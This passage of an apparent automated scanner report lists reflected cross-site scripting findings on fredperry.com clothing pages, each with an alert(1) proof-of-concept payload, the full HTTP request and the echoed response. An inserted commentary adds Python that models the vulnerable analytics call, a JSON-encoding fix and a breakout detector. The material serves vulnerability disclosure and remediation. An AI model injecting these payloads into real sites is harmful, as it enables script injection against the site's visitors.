Content-Length: 38590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/shirts/?e2d16"-alert(1)-"a05c72fdefc=1");
//]]>
...[SNIP]...

1.267. http://www.fredperry.com/women/skirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/skirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ad15"-alert(1)-"728545c861 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women2ad15"-alert(1)-"728545c861/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2do6j1q2fvqoha0sk554ck7jb6; expires=Tue, 09-Nov-2010 17:09:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women2ad15"-alert(1)-"728545c861/skirts/");
//]]>
...[SNIP]...

1.268. http://www.fredperry.com/women/skirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/skirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f9c8"-alert(1)-"3fa819d4374 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/skirts1f9c8"-alert(1)-"3fa819d4374/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m60qji43298l5lpmehltqknat7; expires=Tue, 09-Nov-2010 17:09:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/skirts1f9c8"-alert(1)-"3fa819d4374/");
//]]>
...[SNIP]...
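Every finding in this report, on the catalogue pages and on the 404 template alike, has the same sink: the Google Analytics call `pageTracker._trackPageview("...")` is built from the raw request URI, so a `"` anywhere in the path or query string closes the JavaScript string and the remainder executes. The Python below is an added example, not code from the report or from the site's PHP/Magento templates (the server identifies itself as PHP 5.2.14, and the `magento=` cookie gives the platform). It models the vulnerable rendering, a hardened renderer that emits the URI as a JSON string literal with `</` split, and a scanner-style check that decides whether a reflected canary actually terminates the string literal rather than merely appearing in the page. The request URI and canary are constructed from finding 1.268; the `</script>` sample is constructed too.

```python
import json
import re

# Constructed sample input taken from finding 1.268: the canary the scanner
# placed in REST URL parameter 2, and the request URI it produces.
CANARY = '1f9c8"-alert(1)-"3fa819d4374'
REQUEST_URI = '/women/skirts%s/' % CANARY


def render_tracker_vulnerable(request_uri):
    """Model of the site's template: the raw request URI is dropped straight
    into a double-quoted JavaScript string (this is what the responses show)."""
    return 'pageTracker._trackPageview("%s");' % request_uri


def js_string_literal(value):
    """Serialise a str as a JavaScript string literal safe inside <script>.

    json.dumps() escapes the quote and backslash characters and, with the
    default ensure_ascii=True, every non-ASCII code point (so U+2028/U+2029,
    which older JS engines treat as line terminators, cannot appear raw).
    '</' is then split so the literal can never contain '</script>'.
    """
    return json.dumps(value).replace('</', '<\\/')


def render_tracker_hardened(request_uri):
    """Same call, but the argument is a properly encoded string literal."""
    return 'pageTracker._trackPageview(%s);' % js_string_literal(request_uri)


def _string_literal_end(arg):
    """Index just past the closing quote of the JS string literal that starts
    at arg[0], honouring backslash escapes; -1 if it is never closed."""
    quote = arg[0]
    i = 1
    while i < len(arg):
        if arg[i] == '\\':
            i += 2          # escaped character: skip it whatever it is
            continue
        if arg[i] == quote:
            return i + 1
        i += 1
    return -1


# One _trackPageview(...) call per line, as in the report's responses.
_TRACK_RE = re.compile(r'_trackPageview\((.*)\);\s*$', re.M)


def breaks_out_of_string(body):
    """Scanner-style check: True if the _trackPageview argument is not one
    single, well-formed string literal, i.e. reflected input closed the quote
    early (or no literal is there at all). False if the call is absent."""
    m = _TRACK_RE.search(body)
    if not m:
        return False
    arg = m.group(1)
    if not arg or arg[0] not in '"\'':
        return True
    return _string_literal_end(arg) != len(arg)


def contains_script_close(body):
    """Second check a reviewer wants: could the reflected text end the
    <script> element regardless of string quoting?"""
    return '</script' in body.lower()


if __name__ == '__main__':
    for name, render in (('vulnerable', render_tracker_vulnerable),
                         ('hardened', render_tracker_hardened)):
        line = render(REQUEST_URI)
        print('%-10s %s' % (name, line))
        print('           breakout=%s script_close=%s'
              % (breaks_out_of_string(line), contains_script_close(line)))
```

In the PHP template the equivalent fix is to emit the argument with `json_encode()`, which escapes `"`, `\` and, by default, `/` (so `</script>` becomes `<\/script>`), instead of echoing `REQUEST_URI` verbatim; passing the resolved route rather than the raw URI removes the attacker-controlled input from the script block altogether. Whatever the fix, re-test both the catalogue pages and the 404 template, because the report shows the unknown-path variants reflecting just as the query-string variants do.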

1.269. http://www.fredperry.com/women/skirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/skirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f77ce"-alert(1)-"386d0fe9234 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/skirts/?f77ce"-alert(1)-"386d0fe9234=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8c21fmkpr5eg0k356pfa2pbb66; expires=Tue, 09-Nov-2010 17:07:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/skirts/?f77ce"-alert(1)-"386d0fe9234=1");
//]]>
...[SNIP]...

1.270. http://www.fredperry.com/women/t-shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/t-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9b0f"-alert(1)-"ae623475fab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womend9b0f"-alert(1)-"ae623475fab/t-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j0ul9h5mu39ujejiljj4rrape5; expires=Tue, 09-Nov-2010 17:10:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womend9b0f"-alert(1)-"ae623475fab/t-shirts/");
//]]>
...[SNIP]...

1.271. http://www.fredperry.com/women/t-shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/t-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb784"-alert(1)-"01ef9dfe59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/t-shirtscb784"-alert(1)-"01ef9dfe59/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ppmqmsgne1hf0t6hk5mtjo9s20; expires=Tue, 09-Nov-2010 17:11:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/t-shirtscb784"-alert(1)-"01ef9dfe59/");
//]]>
...[SNIP]...

1.272. http://www.fredperry.com/women/t-shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/t-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66544"-alert(1)-"f7acbf1dc58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/t-shirts/?66544"-alert(1)-"f7acbf1dc58=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ha85bn91m4herp3o8gp8d0bhp4; expires=Tue, 09-Nov-2010 17:09:24 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> T-Shirt
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/t-shirts/?66544"-alert(1)-"f7acbf1dc58=1");
//]]>
...[SNIP]...

1.273. http://www.fredperry.com/women/tennis/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/tennis/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a53c7"-alert(1)-"994703c0c99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womena53c7"-alert(1)-"994703c0c99/tennis/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=fo3o6qv4af1kubaotq1ts943l4; expires=Tue, 09-Nov-2010 17:05:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womena53c7"-alert(1)-"994703c0c99/tennis/");
//]]>
...[SNIP]...

1.274. http://www.fredperry.com/women/tennis/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/tennis/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cf10"-alert(1)-"ad3cd9e9c46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/tennis4cf10"-alert(1)-"ad3cd9e9c46/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=apfgaeqod633ssa6ckondoiia3; expires=Tue, 09-Nov-2010 17:05:57 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/tennis4cf10"-alert(1)-"ad3cd9e9c46/");
//]]>
...[SNIP]...

1.275. http://www.fredperry.com/women/tennis/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/tennis/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb341"-alert(1)-"426635fe36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/tennis/?bb341"-alert(1)-"426635fe36=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1123hl90vej508idi45n7idds2; expires=Tue, 09-Nov-2010 17:04:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Tennis
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/tennis/?bb341"-alert(1)-"426635fe36=1");
//]]>
...[SNIP]...

1.276. http://www.fredperry.com/women/trousers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/trousers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload febe6"-alert(1)-"e4e83b03fd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womenfebe6"-alert(1)-"e4e83b03fd7/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:08:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gph8cguvj4t1eieejeie3ppq33; expires=Tue, 09-Nov-2010 17:08:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womenfebe6"-alert(1)-"e4e83b03fd7/trousers/");
//]]>
...[SNIP]...

1.277. http://www.fredperry.com/women/trousers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/trousers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4b5d"-alert(1)-"465b00fb799 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/trousersa4b5d"-alert(1)-"465b00fb799/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:08:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hbq1jlki9npmfs836p444rlnf0; expires=Tue, 09-Nov-2010 17:08:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/trousersa4b5d"-alert(1)-"465b00fb799/");
//]]>
...[SNIP]...

1.278. http://www.fredperry.com/women/trousers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/trousers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea727"-alert(1)-"53defb14701 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/trousers/?ea727"-alert(1)-"53defb14701=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f6glm1hr1i5labspr11vtjaf66; expires=Tue, 09-Nov-2010 17:07:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Trouser
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/trousers/?ea727"-alert(1)-"53defb14701=1");
//]]>
...[SNIP]...

1.279. http://www.fredperry.com/women/woven-shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/woven-shirts/

Issue detail

